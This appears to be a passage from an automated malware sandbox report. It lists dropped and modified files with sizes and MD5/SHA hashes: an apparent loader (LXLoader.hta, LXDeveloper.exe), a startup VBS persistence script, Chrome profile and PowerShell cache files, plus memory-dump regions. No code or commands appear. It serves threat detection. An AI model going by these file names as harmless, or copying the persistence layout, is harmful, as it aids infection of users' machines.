f7305f7b196a13033b1735b1d15e7e8f9d54251db0740f7e1d077373101b36e7c325d94c01b29d7e52008b90e7467b01d6f38b2ee2871a4acf14571e311bb118

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
705B

MD5
becad9e80e9ce6844dd35d27c8c6b24f

SHA1
10d96420f7990513af0bab1b281a2428f71e44b5

SHA256
03f8da3525b1d401f7440a94e1be5aee8ce24d5576c8380a8b8b7dc73b030e7d

SHA512
52250dc234277ae9a1c29dcff4df24b2ee8749561cb0196f97f6a7dfd685793b251927a8823653d252841e79b3f7e7badab2caa53f7e2b36a45913de2af89311

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
ca03c796de8bc429f877af989f63c74f

SHA1
00d4076373b3bd47eaaaba3941bed5cf36c86c2d

SHA256
e8af766833dcbc1d95c6d8fbe0fa2755262fb2e62fc3ef58e069cda7db6adf92

SHA512
adac9327887d9871d2e4ee258f9a60ad34f381a6b8b63c35f2a36ed52097c2db9bbb0775a45614a0673854b957f579a625df00ad0c7242a89bbd8fad0d5e6721

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
bbd67a4bdfbc71ff1bb1067c15cf230d

SHA1
63c9fc284eefed7ac4be6becbeac09866d064e0d

SHA256
fcbcc2d124abb0b1dede2df51d1e13a46f03fbc84f6642c6608084ffc6fa53b4

SHA512
0b0a50813730b1cec085dd8af9db277da5a050925baf35c89fa01dcff973d5d0f4576fa10823c90b0a57ab72f8b5e2c31becb9db85b01ad77e2e73e974a0ce44

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
b8d625e10d424189ed2d20343d7a9feb

SHA1
aa7c7935eca6c98abf3bab5a7bee335689fd2e72

SHA256
9dffd71699ada971182510185bfc2a7759b551ca58aecedde19c07217337d5c0

SHA512
2a8ac8597174aa523ec8e651f1fe8931842cbb821cde5598c4d908aee2343fb47cf30e195b4f5599f71b517f00b0adaf2ac9bf8516ffb431114584edeeb91154

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
35fb3123861f9bce5302f2d8380dc3d3

SHA1
982496071c114108e47a56a3508559297d702985

SHA256
94801b12b910a2e877e68c8c3a03cd8ddd06b12761002de76e63c5fe6c25e336

SHA512
bb3d6b7e2506c27f0b9820a086014b2c9dd9cf7a0d895d935fad0db25a939bd047551a81e19559a3d53c8ec362c60f05f8d827c41f524768106697d7497d7112

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Visited Links
Filesize
128KB

MD5
d452130f2bb63061ca118d72ae1e98ac

SHA1
5c135c6cbb40c035808eeeb32a53e292e98991d8

SHA256
a05fe0df69000672eb77a8a4e4ed9704ae6a373009ae155c927a50818112c65d

SHA512
72ae59d4e981d251ad96bd48289a432bb02a11ac3fb21fce9b77ad059aa0fe6f6b06ad73fa5062ed6cd9ffdde3edf7fabd5a7c041b9e54b6625144f24640c97b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Browser
Filesize
106B

MD5
de9ef0c5bcc012a3a1131988dee272d8

SHA1
fa9ccbdc969ac9e1474fce773234b28d50951cd8

SHA256
3615498fbef408a96bf30e01c318dac2d5451b054998119080e7faac5995f590

SHA512
cea946ebeadfe6be65e33edff6c68953a84ec2e2410884e12f406cac1e6c8a0793180433a7ef7ce097b24ea78a1fdbb4e3b3d9cdf1a827ab6ff5605da3691724

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
Filesize
14B

MD5
9eae63c7a967fc314dd311d9f46a45b7

SHA1
caba9c2c93acfe0b9ceb9ab19b992b0fc19c71cf

SHA256
4288925b0cf871c7458c22c46936efb0e903802feb991a0e1803be94ca6c251d

SHA512
bed924bff236bf5b6ce1df1db82e86c935e5830a20d9d24697efd82ca331e30604db8d04b0d692ec8541ec6deb2225bcc7d805b79f2db5726642198ecf6348b8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
136KB

MD5
5bb766ee39130536f7ced9c5bdcf142b

SHA1
043fdea687f9fc9767b2df94baf0f02af38c7c55

SHA256
374d4b5a4b48c4c4bbfd8c19572e0048827aabf6f1ab9ee2cc949931381b4348

SHA512
6b54cff388181e3ddebd27a4b465a5cabafe59e2b36cf58b30be71ece5ec118c0979ad6cba7881b9b870c0775c78dfbbd642d5b51a8fcee92fdfe887ae432f70

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
Filesize
105KB

MD5
589c3472c8840527841b1c19ee8a52bf

SHA1
f8f05e59e4c61bee2e6122addf08fb05a289fd13

SHA256
763ff793f0a8ca10e89cab0b994a8583d63281efae357815c6961dc148a502ae

SHA512
121fa0c3986a168410eec9ab7467e90ea897cc0b23ecfd922afe186773a295b15c2ee891e7245098ce26aed94a96003fc830b24515ce25f2bd503808410065b1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58894f.TMP
Filesize
93KB

MD5
fa28db173dfacac16a0c387dceded7fc

SHA1
6e926ae0c8a632f7d3d0981175b6bb091ca0a309

SHA256
4f539de9109f7e6994b9297b625e41af41b5985a34c90f9e64e5788dc3fabc85

SHA512
396c927dbdaa59813b0bd9d5a585b459ce1ab378b7a60b580460b863a417cc136ce821f4732fc7ce5d25c1352fc0a63e559313f92454607361dbb9aa87f5b1c4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations
Filesize
86B

MD5
961e3604f228b0d10541ebf921500c86

SHA1
6e00570d9f78d9cfebe67d4da5efe546543949a7

SHA256
f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed

SHA512
535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
50KB

MD5
2143b379fed61ab5450bab1a751798ce

SHA1
32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e

SHA256
a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81

SHA512
0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
2KB

MD5
aeb24b5729d62e81a27174f46d431126

SHA1
baa02ac3f99822d1915bac666450dc20727494bb

SHA256
d2b2e09bffd835255b1fb57c2aa92e5c28c080eb033e1f042087d36a93393471

SHA512
e62f6771339326a90f03b79f8a3321c4f00d66e5f228055f17b75d028895f80ce374bd0143ec971f55efa861b949ec672bfda9df7fb45444b17f3dbe479a5415

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f2321d01e26b28fb5864a280b2928191

SHA1
e6e26cd38b0e8a7ab7c63d971e5532a488d2bc3f

SHA256
5f48ef39cdb0192b48a6b7ac989c1df77ddc434ffe18f50aecd1f349ac255860

SHA512
a6068321bd5fa35b717faa58d5d53abe4c166d721e866912cc3dc996b8c3fb55b206af90863de92ca5489695bc90b74cf0acf93e4f761fcc6546cf900cba099f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
9f5f2d7b60dcb249acfc5ae395e6721d

SHA1
92c6d02d697f6c02029e58e40ff79fafc4ad3051

SHA256
b42438856546a0ca4ef4772dac0e0becbd7af3055ee2f823cf90474fe3d7fd8f

SHA512
234e7d226b17e43bde4f871c446f1e18d1cdfdd3b38cf9fa3bcb090301d238864ea554a62e15ba0cf8d43353c6f3e7d95ec0fbf3a6dbcfef01ba2215596a6ac9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
3bb48995a2a198988fa39992db0dbf03

SHA1
977712195bf9953ae3d642b875781a6f441695f0

SHA256
36c584417ff5c97f98e0cb9567b25f3bca641139def0f451bce6c99fcc307172

SHA512
a379d85ae494ef1f9c4a32b2b936d67355fab3ed3d45025c1d6f026d95ae753dd5be424f368e575dcb43848627c8e9d5e78d813bbe8841af374aa733fba4ee6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
48bba15a0e0041ba3ca37fb5176d8f98

SHA1
3882e21f2f80aab640cf10afcca11953278697d0

SHA256
fcfdc9e52f2a767d2b4faf3e48f44378d5b64bbf6f9443f2b8881ca28b8f8640

SHA512
e3612142de2f5aa3f6449f9f465eb0203cc60708834b302ef09487b5bc604a79b2f1292c153c369357a91996a1a287e17313b81ef5dc9c172b2dfadd1b0fb273

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d2131d244d7d0fbeb66d5c0983f59f68

SHA1
35c76a1143dd07ca02ad9e5d122a9126e8757e87

SHA256
924a7575b625a67f3b8912e1b938e62a5c8ae4d5c4c60341370b862736606d0f

SHA512
247d072eb0307a6bb52a81bd27ddff31bdd1acf0f2c467af3cab3972aba6a2e2dc7cc5b2be2162c8b0486588e1a10ac1ae9a32fc46f5c628148d9d0d6098c501

Download Submit
C:\Users\Admin\AppData\Local\Temp\LXDeveloper.exe
Filesize
227KB

MD5
5ea35df19a4a427188a71eaef21e18f9

SHA1
96576fe4d1190f4763dad5b1eadc28cf08a5f514

SHA256
5011f781ee0d9e78eccbc3406df594e40b7565aa5eb07d75404c15205ebfdf57

SHA512
b7ab1a9933a8d7b9e19ecf24c4b0a0ee52b44f6efc60ae564c0581ae205d8c92576478a948fe547fe2fafd9246451480988bb9c7362c260c9c36627749c0fd04

Download Submit
C:\Users\Admin\AppData\Local\Temp\LXLoader.hta
Filesize
1KB

MD5
634d4287e13fdacc66bc03d791c283ee

SHA1
9c716981f3610af98a55c891a2fa4cb471d3499f

SHA256
6f8f8505a3d04ce21351d07a1f43313ac988beb1b157b04f35abbb1715787c48

SHA512
cb78a2a3a39febde803c4a466e5c3526b89247da08f83118b72527d7fabacc6097745d8d650dd0ce36a532e1115ebe8fe6ec0a653e6f5712dce7995e059c5910

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oggkrvso.v0c.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_761.vbs
Filesize
124B

MD5
3c522d244cce3c1c167a3408950a7773

SHA1
3ee4f23fc5f7407246a663fc6097e9232f41d2f8

SHA256
23551b382c16e6790d3c53aac517ce713026e09386cb19eadbadde0c82d7892f

SHA512
6e90fa056e7b1bb3ce5e1b4f254d09de26ff04980c60584eb58d662ca4c1832e35716f0b724266a623bb4ef1ba4dd5d9ebe6ddcf70383392828d791e51f71146

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 305338.crdownload
Filesize
611KB

MD5
7fc2f81cc1c38aa26c5c7b6b9ad66fec

SHA1
0809b3600344412c7924313bc1d95d9d22903a69

SHA256
1d7494b0fc1b6c2d78b0d7e64835c749ca7204c21c8af09f7893aa7ba1f8b0ef

SHA512
cea796af05da666a4eace521f82d1d8ce4cae6b61a5576f5dc8b014cd85ce4ffb13885b8bbe50e7f20828ab83bc2d99c35fc3473fa2d8e3ef762453480dfec36

Download Submit
\??\pipe\crashpad_3508_IPHTNVAINKKRXYLR
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/336-346-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/588-333-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/752-332-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/1096-347-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/1180-334-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/1332-342-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/1416-336-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/1532-337-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/1564-335-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/1728-345-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/1748-330-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/1924-338-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/2124-331-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/2136-404-0x0000000000D10000-0x0000000000D4E000-memory.dmp

Filesize
248KB

Download
memory/2136-646-0x00000000014E0000-0x00000000014F0000-memory.dmp

Filesize
64KB

Download
memory/2236-372-0x0000023F34600000-0x0000023F3464A000-memory.dmp

Filesize
296KB

Download
memory/2284-343-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/2308-344-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/2472-341-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/2540-349-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/2548-340-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/3168-339-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/3456-319-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download
memory/3456-284-0x0000000009690000-0x00000000096BA000-memory.dmp

Filesize
168KB

Download
memory/4736-221-0x00007FF982810000-0x00007FF9831FC000-memory.dmp

Filesize
9.9MB

Download
memory/4736-156-0x0000022EB8A90000-0x0000022EB8B04000-memory.dmp

Filesize
464KB

Download
memory/4736-155-0x0000022EB84D0000-0x0000022EB84D8000-memory.dmp

Filesize
32KB

Download
memory/4736-154-0x00007FF982810000-0x00007FF9831FC000-memory.dmp

Filesize
9.9MB

Download
memory/4736-143-0x0000022EB8A10000-0x0000022EB8A86000-memory.dmp

Filesize
472KB

Download
memory/4736-132-0x0000022EB8720000-0x0000022EB875C000-memory.dmp

Filesize
240KB

Download
memory/4736-107-0x00007FF982810000-0x00007FF9831FC000-memory.dmp

Filesize
9.9MB

Download
memory/4736-95-0x00007FF982810000-0x00007FF9831FC000-memory.dmp

Filesize
9.9MB

Download
memory/4736-92-0x0000022EB8450000-0x0000022EB8472000-memory.dmp

Filesize
136KB

Download
memory/4736-89-0x00007FF982813000-0x00007FF982814000-memory.dmp

Filesize
4KB

Download
memory/4860-348-0x00007FF960710000-0x00007FF960720000-memory.dmp

Filesize
64KB

Download